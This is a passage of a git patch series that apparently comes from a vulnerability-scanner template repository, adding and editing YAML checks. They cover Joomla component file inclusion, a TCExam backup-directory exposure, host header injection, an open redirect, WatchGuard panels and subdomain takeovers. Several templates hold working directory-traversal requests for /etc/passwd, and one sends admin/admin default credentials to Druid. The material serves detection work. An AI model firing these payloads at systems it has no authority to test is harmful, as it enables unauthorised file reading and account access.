Prince Chaddha Date: Mon, 6 Sep 2021 17:13:48 +0530 Subject: [PATCH 2062/4083] Revert "Create host-header-injection.yaml" This reverts commit 6abfcd80e1052425254d2931270b04f3376afc23. --- .../generic/host-header-injection.yaml | 32 ------------------- 1 file changed, 32 deletions(-) delete mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml deleted file mode 100644 index 9166fdec4d..0000000000 --- a/vulnerabilities/generic/host-header-injection.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: host-header-injection - -info: - name: Host Header Injection - author: princechaddha - severity: info - description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. - reference: - - https://portswigger.net/web-security/host-header - - https://portswigger.net/web-security/host-header/exploiting - - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ - tags: hostheader-injection,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - headers: - Host: "{{randstr}}.tld" - - matchers-condition: and - matchers: - - type: word - words: - - '{{randstr}}.tld' - part: body - condition: and - - - type: status - status: - - 200 From acd46242008553c52b03928308ead6a9d808e174 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:14:27 +0530 Subject: [PATCH 2063/4083] Create host-header-injection.yaml --- .../generic/host-header-injection.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/generic/host-header-injection.yaml diff --git a/vulnerabilities/generic/host-header-injection.yaml b/vulnerabilities/generic/host-header-injection.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null +++ b/vulnerabilities/generic/host-header-injection.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 From 1942d13ed6e3b89e1e2063e0a8fca881a489b564 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:15:30 +0530 Subject: [PATCH 2064/4083] Update openvpn-hhi.yaml --- vulnerabilities/other/openvpn-hhi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 73ecf8ec1c..2611426abb 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -4,7 +4,7 @@ info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar severity: info - tags: openvpn,hhi + tags: openvpn,hostheader-injection requests: - raw: From e1ab21616f0752e849104a9146a4778b0fe6b0f0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:30:51 +0530 Subject: [PATCH 2065/4083] Update CVE-2021-20114.yaml --- cves/2021/CVE-2021-20114.yaml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index c96a554177..c0a6d7dbf0 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -4,17 +4,26 @@ info: name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor author: n/a severity: high - reference: https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true - description: | - When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. - tags: cve,cve2021,tcexam + description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. + reference: + - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true + - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 + tags: cve,cve2021,tcexam,disclosure requests: - method: GET path: - "{{BaseURL}}/cache/backup/" + matchers-condition: and matchers: + - type: word + words: + - "Index of /cache/backup" + - "Parent Directory" + - ".sql.gz" + condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From e9d5665383db40a06c6b91aa8f023f31a4b7f0e5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:34:51 +0530 Subject: [PATCH 2066/4083] Update gsoap-lfi.yaml --- vulnerabilities/other/gsoap-lfi.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/gsoap-lfi.yaml b/vulnerabilities/other/gsoap-lfi.yaml index f7bd7c67e7..e679dee126 100644 --- a/vulnerabilities/other/gsoap-lfi.yaml +++ b/vulnerabilities/other/gsoap-lfi.yaml @@ -8,9 +8,13 @@ info: tags: gsoap,lfi requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../../../../../etc/passwd" + - raw: + - | + GET /../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 + Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close matchers-condition: and matchers: From 54e5eea58124202e3b34ee07f84a1c495b84fa82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 Sep 2021 17:48:01 +0530 Subject: [PATCH 2067/4083] Update CVE-2021-20114.yaml --- cves/2021/CVE-2021-20114.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index c0a6d7dbf0..981a841397 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -2,7 +2,7 @@ id: CVE-2021-20114 info: name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor - author: n/a + author: push4d severity: high description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files. reference: From ec072ea1c83390d2e1c4d951e9a42432af37092e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 6 Sep 2021 20:11:21 +0530 Subject: [PATCH 2068/4083] misc update --- default-logins/abb/cs141-default-login.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 531ed5ae2d..1f3cfe52ce 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -6,6 +6,8 @@ info: severity: medium reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf tags: hiawatha,iot,default-login + additional-fields: + shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22 requests: - raw: From 8ed50e204ff49278a8dd849ec8d36ae25ab66a78 Mon Sep 17 00:00:00 2001 From: ahmetpergamum Date: Mon, 6 Sep 2021 17:52:56 +0300 Subject: [PATCH 2069/4083] Added Watchguard Panel Template --- exposed-panels/watchguard.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/watchguard.yaml diff --git a/exposed-panels/watchguard.yaml b/exposed-panels/watchguard.yaml new file mode 100644 index 0000000000..e1af7a14ae --- /dev/null +++ b/exposed-panels/watchguard.yaml @@ -0,0 +1,25 @@ +id: watchguard + +info: + name: Watchguard + author: ahmetpergamum + severity: info + reference: https://www.exploit-db.com/ghdb/7008 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/sslvpn_logon.shtml' + + matchers-condition: and + matchers: + - type: word + words: + - 'User Authentication' + - 'WatchGuard Technologies' + condition: or + + - type: status + status: + - 200 From fe784d49e0584a856b4a564e44dcabc3129731f2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 00:00:25 +0530 Subject: [PATCH 2070/4083] misc update --- exposed-panels/{watchguard.yaml => watchguard-panel.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposed-panels/{watchguard.yaml => watchguard-panel.yaml} (81%) diff --git a/exposed-panels/watchguard.yaml b/exposed-panels/watchguard-panel.yaml similarity index 81% rename from exposed-panels/watchguard.yaml rename to exposed-panels/watchguard-panel.yaml index e1af7a14ae..6029717174 100644 --- a/exposed-panels/watchguard.yaml +++ b/exposed-panels/watchguard-panel.yaml @@ -1,7 +1,7 @@ -id: watchguard +id: watchguard-panel info: - name: Watchguard + name: Watchguard Panel author: ahmetpergamum severity: info reference: https://www.exploit-db.com/ghdb/7008 @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - 'User Authentication' + - 'User Authentication' - 'WatchGuard Technologies' condition: or From 56b02ed87b6943fbcc758bf59f260d240d47d70f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 7 Sep 2021 07:35:15 +0700 Subject: [PATCH 2071/4083] Create CVE-2010-1534.yaml --- cves/2010/CVE-2010-1534.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1534.yaml diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml new file mode 100644 index 0000000000..871c657677 --- /dev/null +++ b/cves/2010/CVE-2010-1534.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1534 + +info: + name: Joomla! Component Shoutbox Pro - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12067 + - https://www.cvedetails.com/cve/CVE-2010-1534 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 541d48c25e57885eafb5ba7fc6e5c7b871a7722a Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:52:09 +0900 Subject: [PATCH 2072/4083] =?UTF-8?q?Create=20CVE-2018=E2=80=9314064.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- CVE-2018–14064.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 CVE-2018–14064.yaml diff --git a/CVE-2018–14064.yaml b/CVE-2018–14064.yaml new file mode 100644 index 0000000000..68796ed2a0 --- /dev/null +++ b/CVE-2018–14064.yaml @@ -0,0 +1,26 @@ +id: cve-2018-14064 + +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + reference: | + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + tags: velotismart,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 4da291ef6d71c2ba05d7136f3c0a63bb7726d7c3 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:54:45 +0900 Subject: [PATCH 2073/4083] Create phpwiki-lfi.yaml --- phpwiki-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 phpwiki-lfi.yaml diff --git a/phpwiki-lfi.yaml b/phpwiki-lfi.yaml new file mode 100644 index 0000000000..d48b733698 --- /dev/null +++ b/phpwiki-lfi.yaml @@ -0,0 +1,24 @@ +id: phpwiki-lfi + +info: + name: phpwiki 1.5.4 - XSS / Local File Inclusion + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/38027 + tags: phpwiki,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/phpwiki/index.php/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 4aa8c2f4eef6223ceed843ad0ba615523acc52c1 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:57:06 +0900 Subject: [PATCH 2074/4083] Create homeautomation-v3-openredirect.yaml --- homeautomation-v3-openredirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 homeautomation-v3-openredirect.yaml diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml new file mode 100644 index 0000000000..f0a3bda1d4 --- /dev/null +++ b/homeautomation-v3-openredirect.yaml @@ -0,0 +1,19 @@ +id: homeautomation-v3-openredirect + +info: + name: HomeAutomation v3.3.2 Open Redirect + author: 0x_Akoko + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php + severity: medium + tags: homeautomation,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 7a518df21be12293dc47f6a628561933d9e091f4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:13:12 +0700 Subject: [PATCH 2075/4083] Create CVE-2010-1607.yaml --- cves/2010/CVE-2010-1607.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1607.yaml diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml new file mode 100644 index 0000000000..81f69a9578 --- /dev/null +++ b/cves/2010/CVE-2010-1607.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1607 + +info: + name: Joomla! Component WMI 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12316 + - https://www.cvedetails.com/cve/CVE-2010-1607 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f5358eaf1928c5d12c901075ad6745a69e97f330 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 17:57:11 +0530 Subject: [PATCH 2076/4083] Update homeautomation-v3-openredirect.yaml --- homeautomation-v3-openredirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml index f0a3bda1d4..a34fdd4b47 100644 --- a/homeautomation-v3-openredirect.yaml +++ b/homeautomation-v3-openredirect.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php severity: medium - tags: homeautomation,redirect + tags: iot,redirect requests: - method: GET From 72e74197323dbafd7d98c9e3bd9866ae1ccd8f18 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 17:58:44 +0530 Subject: [PATCH 2077/4083] Update homeautomation-v3-openredirect.yaml --- homeautomation-v3-openredirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml index a34fdd4b47..9388597d8d 100644 --- a/homeautomation-v3-openredirect.yaml +++ b/homeautomation-v3-openredirect.yaml @@ -3,8 +3,8 @@ id: homeautomation-v3-openredirect info: name: HomeAutomation v3.3.2 Open Redirect author: 0x_Akoko - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php severity: medium + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect requests: From 9b754866163fd26a4dead3635c9d57fb7bfe0411 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 18:07:48 +0530 Subject: [PATCH 2078/4083] Rename homeautomation-v3-openredirect.yaml to vulnerabilities/other/homeautomation-v3-openredirect.yaml --- .../other/homeautomation-v3-openredirect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename homeautomation-v3-openredirect.yaml => vulnerabilities/other/homeautomation-v3-openredirect.yaml (100%) diff --git a/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml similarity index 100% rename from homeautomation-v3-openredirect.yaml rename to vulnerabilities/other/homeautomation-v3-openredirect.yaml From ef6350bfcc2767f967fe16efd8fa80de21798af6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 18:14:38 +0530 Subject: [PATCH 2079/4083] =?UTF-8?q?Update=20and=20rename=20CVE-2018?= =?UTF-8?q?=E2=80=9314064.yaml=20to=20cves/2018/CVE-2018=E2=80=9314064.yam?= =?UTF-8?q?l?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- CVE-2018–14064.yaml | 26 -------------------------- cves/2018/CVE-2018–14064.yaml | 28 ++++++++++++++++++++++++++++ 2 files changed, 28 insertions(+), 26 deletions(-) delete mode 100644 CVE-2018–14064.yaml create mode 100644 cves/2018/CVE-2018–14064.yaml diff --git a/CVE-2018–14064.yaml b/CVE-2018–14064.yaml deleted file mode 100644 index 68796ed2a0..0000000000 --- a/CVE-2018–14064.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cve-2018-14064 - -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: high - reference: | - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - tags: velotismart,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/cves/2018/CVE-2018–14064.yaml b/cves/2018/CVE-2018–14064.yaml new file mode 100644 index 0000000000..ddac97cab7 --- /dev/null +++ b/cves/2018/CVE-2018–14064.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-14064 + +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. + reference: + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 + tags: cve,cve2018,lfi,camera,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From ded0c4de57a667fb0d67f2bc7c21cb8bf5f68999 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:31:35 +0530 Subject: [PATCH 2080/4083] Removing takeover templates with no actual impact --- takeovers/acquia-takeover.yaml | 21 --------------------- takeovers/ceros-takeover.yaml | 23 ----------------------- takeovers/fastly-takeover.yaml | 18 ------------------ takeovers/freshservice-takeover.yaml | 21 --------------------- takeovers/landingi-takeover.yaml | 20 -------------------- takeovers/medium-takeover.yaml | 20 -------------------- takeovers/smartling-takeover.yaml | 17 ----------------- takeovers/vercel-takeover.yaml | 20 -------------------- 8 files changed, 160 deletions(-) delete mode 100644 takeovers/acquia-takeover.yaml delete mode 100644 takeovers/ceros-takeover.yaml delete mode 100644 takeovers/fastly-takeover.yaml delete mode 100644 takeovers/freshservice-takeover.yaml delete mode 100644 takeovers/landingi-takeover.yaml delete mode 100644 takeovers/medium-takeover.yaml delete mode 100644 takeovers/smartling-takeover.yaml delete mode 100644 takeovers/vercel-takeover.yaml diff --git a/takeovers/acquia-takeover.yaml b/takeovers/acquia-takeover.yaml deleted file mode 100644 index 3740c22e91..0000000000 --- a/takeovers/acquia-takeover.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: acquia-takeover - -info: - name: Acquia Takeover Detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: acquia - words: - - If you are an Acquia Cloud customer and expect to see your site at this address - - The site you are looking for could not be found. - condition: and \ No newline at end of file diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml deleted file mode 100644 index f39d129637..0000000000 --- a/takeovers/ceros-takeover.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: ceros-takeover - -info: - name: ceros takeover detection - author: abison_binoy - severity: info - tags: takeover - reference: - - https://twitter.com/abison_binoy/status/1412606224030339072 - - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Sorry, page not found" - - "Please check the url and" - - "/view.ceros.com/" - condition: and diff --git a/takeovers/fastly-takeover.yaml b/takeovers/fastly-takeover.yaml deleted file mode 100644 index 4b606dfab2..0000000000 --- a/takeovers/fastly-takeover.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: fastly-takeover - -info: - name: fastly takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Fastly error: unknown domain:" \ No newline at end of file diff --git a/takeovers/freshservice-takeover.yaml b/takeovers/freshservice-takeover.yaml deleted file mode 100644 index f8365be078..0000000000 --- a/takeovers/freshservice-takeover.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: freshservice-takeover - -info: - name: freshservice takeover detection - author: philippedelteil - severity: info - tags: takeover - reference: https://twitter.com/secuaudit/status/1142514805590433793 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - 'There is no helpdesk here!' - - 'Maybe this is still fresh!' - - 'freshservice.com' - condition: and \ No newline at end of file diff --git a/takeovers/landingi-takeover.yaml b/takeovers/landingi-takeover.yaml deleted file mode 100644 index 2514cf4e17..0000000000 --- a/takeovers/landingi-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: landingi-takeover - -info: - name: landingi takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - It looks like you're lost - - The page you are looking for is not found - condition: and \ No newline at end of file diff --git a/takeovers/medium-takeover.yaml b/takeovers/medium-takeover.yaml deleted file mode 100644 index 4303e7125a..0000000000 --- a/takeovers/medium-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: medium-takeover - -info: - name: Medium Takeover Detection - author: rtcms - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - Oops! We couldn’t find that page - - Sorry about that - condition: and diff --git a/takeovers/smartling-takeover.yaml b/takeovers/smartling-takeover.yaml deleted file mode 100644 index 35aebde041..0000000000 --- a/takeovers/smartling-takeover.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: smartling-takeover - -info: - name: smartling takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67 - -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Domain is not configured diff --git a/takeovers/vercel-takeover.yaml b/takeovers/vercel-takeover.yaml deleted file mode 100644 index cf7dabfebd..0000000000 --- a/takeovers/vercel-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: vercel-takeover - -info: - name: vercel takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/183 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - The deployment could not be found on Vercel. - - DEPLOYMENT_NOT_FOUND - condition: and \ No newline at end of file From 2500db0987a7fd2906c84e1fe208a5f9225f9db5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:31:50 +0530 Subject: [PATCH 2081/4083] misc update --- takeovers/uptimerobot-takeover.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/takeovers/uptimerobot-takeover.yaml b/takeovers/uptimerobot-takeover.yaml index 3f13c6bead..07476af51e 100644 --- a/takeovers/uptimerobot-takeover.yaml +++ b/takeovers/uptimerobot-takeover.yaml @@ -3,16 +3,23 @@ id: uptimerobot-takeover info: name: uptimerobot takeover detection author: pdteam - severity: info + severity: low tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + reference: + - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/ + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: regex regex: - - "^page not found$" \ No newline at end of file + - "^page not found$" + + - type: status + status: + - 404 \ No newline at end of file From d8b8884c607545fd7170d5284869419633a50211 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:38:06 +0530 Subject: [PATCH 2082/4083] misc update --- default-logins/druid/druid-default-password.yaml | 10 +++++----- technologies/druid-detect.yaml | 1 + 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/default-logins/druid/druid-default-password.yaml b/default-logins/druid/druid-default-password.yaml index 0696eafd4a..b4a1e28124 100644 --- a/default-logins/druid/druid-default-password.yaml +++ b/default-logins/druid/druid-default-password.yaml @@ -11,16 +11,16 @@ requests: path: - "{{BaseURL}}/druid/submitLogin" - "{{BaseURL}}/submitLogin" + body: "loginUsername=admin&loginPassword=admin" matchers-condition: and matchers: - - type: word - words: - - 'success' - part: body - condition: and - type: status status: - 200 + + - type: regex + regex: + - "^success$" \ No newline at end of file diff --git a/technologies/druid-detect.yaml b/technologies/druid-detect.yaml index 8cdd990c9e..63b0d5823e 100644 --- a/technologies/druid-detect.yaml +++ b/technologies/druid-detect.yaml @@ -18,6 +18,7 @@ requests: part: body words: - "druid monitor" + - type: status status: - 200 From a06ba7ff1a52f1420caa57e61097326fc741edce Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 8 Sep 2021 06:44:48 +0700 Subject: [PATCH 2083/4083] Create CVE-2010-1956.yaml --- cves/2010/CVE-2010-1956.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1956.yaml diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml new file mode 100644 index 0000000000..a9e931f712 --- /dev/null +++ b/cves/2010/CVE-2010-1956.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1956 + +info: + name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12285 + - https://www.cvedetails.com/cve/CVE-2010-1956 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From d7bccc747e36af824a1331a7c77505045990de69 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 8 Sep 2021 07:00:32 +0700 Subject: [PATCH 2084/4083] Create CVE-2010-2034.yaml --- cves/2010/CVE-2010-2034.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2034.yaml diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml new file mode 100644 index 0000000000..4600c605a4 --- /dev/null +++ b/cves/2010/CVE-2010-2034.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2034 + +info: + name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34003 + - https://www.cvedetails.com/cve/CVE-2010-2034 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - 